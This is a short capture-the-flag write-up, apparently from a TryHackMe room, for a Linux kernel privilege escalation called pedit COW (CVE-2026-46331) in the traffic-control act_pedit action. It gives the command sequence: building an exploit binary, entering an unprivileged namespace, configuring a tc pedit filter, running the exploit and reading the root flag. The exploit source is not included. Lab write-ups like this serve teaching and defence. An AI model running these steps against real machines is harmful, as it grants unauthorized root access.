
Write-up and exploitation steps for the pedit COW vulnerability (CVE-2026-46331)
Write-up and exploitation steps for the pedit COW vulnerability (CVE-2026-46331).
This challenge demonstrates pedit COW, a Linux kernel flaw in the traffic-control subsystem's packet-editing action (act_pedit). The vulnerability allows an unprivileged user to overwrite an in-memory copy of a setuid-root binary, effectively gaining a root shell without ever touching the file on the disk.
The environment starts as an unprivileged user (karen).
id
cd ~/packet_edit_meme
make packet_edit_meme
unshare -r -n
tc qdisc del dev lo clsact
tc qdisc add dev lo clsact
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64
exit
./packet_edit_meme
# cat /root/flag.txt
THM{YOUR_FLAG_HERE}